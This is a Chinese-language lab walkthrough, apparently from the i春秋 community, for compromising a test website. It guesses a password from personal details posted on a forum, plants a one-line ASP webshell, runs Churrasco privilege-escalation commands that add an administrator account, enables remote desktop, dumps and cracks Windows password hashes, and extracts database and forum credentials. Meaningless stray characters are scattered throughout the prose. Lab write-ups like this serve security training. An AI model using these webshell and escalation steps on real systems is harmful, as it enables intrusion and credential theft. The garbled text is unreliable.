作者:獨狼1927
來源:02-在線挑戰(zhàn)詳細攻略-《網(wǎng)站綜合滲透實驗》
系列文章:
01-在線挑戰(zhàn)詳細攻略-《我很簡單春弥,請不要欺負我》
03-在線挑戰(zhàn)詳細攻略-《又見DZ,我能拿你怎么辦》
04-在線挑戰(zhàn)詳細攻略-《2015中國網(wǎng)絡安全大賽:Reinstall真題》
05-在線挑戰(zhàn)詳細攻略-《2015中國網(wǎng)絡安全大賽:框架漏洞真題》
<h1>Step 0</h1>
實驗環(huán)境
操作機:Windows XP [172.16.11.2]
目標網(wǎng)址:www.test.com [172.16.12.2]
ps:www.test.com www.test.ichunqiu都是可以的
實驗工具:
中國菜刀 ipscan MD5Crack2
Domain3.6 NTscan字典 saminside
SuperScan30 X-Scan-v3.3
亦思想社會工程學字典生成器
本實驗要求獲取www.test.com網(wǎng)站的服務器權(quán)限苞俘。
ps:圖片可單擊放大觀看。
<h1>Step 1</h1>
從題目要求可以看出龄章,這個實驗明顯是要突出社會工程學吃谣,所以搜集信息就是必須的了乞封,盡可能的搜集!
打開瀏覽器基协,進入網(wǎng)站首頁歌亲,眼尖的童鞋會發(fā)現(xiàn)菜單最右邊寫著 [攝影論壇],果斷進入論壇轉(zhuǎn)轉(zhuǎn)澜驮;
注意簽名欄:生于唐山大地震锐借!中國人應該都知道唐山大地震是哪一年發(fā)生的吧~
Linhai的出生年份已經(jīng)搞定问麸,回到秋潮視覺工作室首頁,頁面底部有l(wèi)inhai的電子郵箱钞翔,0812很有可能就是linhai的生日严卖;還有他的QQ號:1957692;
綜上所述布轿,我們目前獲得的信息包括:
用戶名:Linhai
出生日期: 1976年08月12日
Email:linhai0812@21cn.com
QQ:1957692
順帶著發(fā)現(xiàn)了后臺入口…
當然絕大多數(shù)后臺是不會直接爆出來的,得用工具驮捍;
目錄掃描
工具:御劍 路徑:C:\Tools\目錄掃描
打開御劍,在域名中輸入http://www.test.com脚曾,開始掃描
<h1>Step 2</h1>
工具:旁注WEB綜合檢測程序Ver3.6修正版
路徑:C:\Tools\注入工具\Domain3.6\Domain3.6.exe
<h1>Setp3</h1>
打開后臺登錄頁面怀各,輸入用戶名linhai,密碼linhai19760812术浪,輸入驗證碼瓢对,點擊 [登陸] 按鈕登錄后臺;
在桌面上新建一個文本文件法焰,在里面寫入一句話木馬
<code><%Eval Request("ichunqiu")%></code>
后面隨便輸入一些內(nèi)容,純粹是為了增加圖片體積倔毙,但要注意埃仪,幾十Kb足矣,體積太大太小都不行陕赃;
打開 [中國菜刀] 連接一句話木馬韭畸;
工具:中國菜刀 路徑:C:\Tools\webshell\中國菜刀\chopper.exe
下一步梆掸,添加賬戶-->開啟3389-->遠程桌面連接-->獲取管理員賬戶密碼扬卷;
<h1>Step 4</h1>
進入C:\RECYCLER目錄,準備上傳提權(quán)工具酸钦;
提權(quán)工具包括Churrasco.exe怪得,3389,cmd卑硫,路徑:C:\Tools\提權(quán)工具\windows
Churrasco.exe 中文名:巴西烤肉徒恋!
Churrasco.exe是Windows2003系統(tǒng)下的一個本地提權(quán)漏洞,通過此工具可以以SYSTEM權(quán)限執(zhí)行命令拔恰,從而可以達到添加用戶的目的因谎。
補丁名:KB956572 MS09-012
使用方法:
<code>Churrasco "net user hacker 123 /add && net localgroup administrators hacker /add"</code>
兩行命令的意思分別是:
netuser hacker 123 /add -->添加一個用戶名為hacker、密碼為123的賬戶颜懊;
netlocalgroup administrators hacker /add -->將賬戶hacker添加到管理員組财岔;
開始上傳工具,選中這三個文件河爹,用鼠標直接拖到中國菜刀中匠璧,即可完成上傳;
下一步咸这,執(zhí)行提權(quán)操作夷恍;右鍵cmd.exe,選擇 [虛擬終端]
成功進入媳维,將目錄切換到C:\RECYCLER
用Churrasco.exe執(zhí)行cmd命令酿雪,添加賬戶遏暴;
<code>Churrasco "net user hacker 123 /add"</code>
賬戶添加成功,繼續(xù)下一步指黎,將新增的賬戶添加到管理員組朋凉;
<code>Churrasco "net localgroup administrators hacker /add"</code>
添加成功,下一步醋安,開啟3389杂彭;
<code>Churrasco 3389</code>
如果出現(xiàn)如上圖中的命令,說明執(zhí)行成功了吓揪,不成功就多執(zhí)行幾次命令亲怠,下一步,連接目標機柠辞;
[開始]-->[運行]-->mstsc
如果找不見目標IP地址团秽,請點擊右上角 [場景拓撲圖] 進行查看:
輸入目標IP地址:172.16.12.2,開始連接钾腺,繼續(xù)輸入用戶名hacker和密碼123徙垫,進入系統(tǒng);
3389連接成功放棒!下一步姻报,獲取系統(tǒng)管理員密碼,準確的說是獲取系統(tǒng)管理員密碼的hash间螟,上傳密碼獲取工具 [中國菜刀]吴旋;
工具很多,這里我們使用Pwdump7厢破;
工具:Pwdump7 路徑: C:\Tools\提權(quán)工具\hash\Pwdump7荣瑟;[ 注意,一定要將libeay32.dll一并上傳摩泪,否則執(zhí)行不了 ]
上傳成功笆焰!
進入目標機,將CMD目錄切換到RECYCLER见坑,運行一條命令:
<code>Pwdump7 > hash.txt</code>
運行成功后嚷掠,會在同一目錄下生成一個文本文件hash.txt;
打開hash.txt荞驴,成功獲取到administrator的hash:
3C8D6C158F6FB3D1FDCFC2AFB2D1BE34:594B9CD2577A5AC2BE0CA522D5EC6ACE
暫時切換出實驗環(huán)境不皆,在你的電腦上打開瀏覽器輸入
http://www.objectif-securite.ch/en/ophcrack.php,在頁面的相應位置輸入hash熊楼,然后GO
ps:如果打不開就翻墻霹娄,或者用其他類似功能的網(wǎng)站也可以,這樣的站很多;
最終輸出結(jié)果:
<h1>Step 5</h1>
數(shù)據(jù)庫sa密碼在哪找犬耻?
WEB應用與數(shù)據(jù)庫之間會有一個配置文件踩晶,用來保存數(shù)據(jù)庫連接信息,包括數(shù)據(jù)庫驅(qū)動香追、數(shù)據(jù)庫名合瓢、用戶名、密碼等信息透典,找到這個文件就找到了密碼
文件名:conn_old.asp
路徑: C:\Inetpub\wwwroot\conn_old.asp
打開文件即可見到Password;
<h1>Step 6</h1>
Linhai論壇登錄密碼在哪里顿苇?
進入C:\Inetput\wwwroot\bbs\Data
發(fā)現(xiàn)有l(wèi)db文件峭咒,一般情況下肯定有mdb文件,看體積應該是dtxy.asp這個文件纪岁;
把這個文件通過菜刀下載到本地凑队,用Domain3.6或其他數(shù)據(jù)庫瀏覽器工具查詢即可;
把dtxy.asp修改為數(shù)據(jù)庫文件dtxy.mdb幔翰;
打開Domain3.6漩氨,點擊 [數(shù)據(jù)庫管理]-->[文件]-->[打開數(shù)據(jù)庫],找到文件dtxy.mdb并打開遗增;
找到表LeadBBS_User叫惊,第三條記錄就是linhai,密碼hash:e10adc3949ba59abbe56e057f20f883e
暫時撤出實驗環(huán)境做修,用你本機的瀏覽器打開http://www.cmd5.com霍狰,輸入密文,點擊破解~
本次實驗到此結(jié)束饰及,希望對大家有所幫助蔗坯,有不足之處請多多指正!
下一講:《又見DZ燎含,我能拿你怎么辦》
ps:部分知識點的內(nèi)容轉(zhuǎn)自網(wǎng)絡宾濒;路漫漫其修遠兮,感謝一路上黑友們的幫助@lonnyboy屏箍;
Dareand the world always yields.
--END--
本文來自:i春秋社區(qū)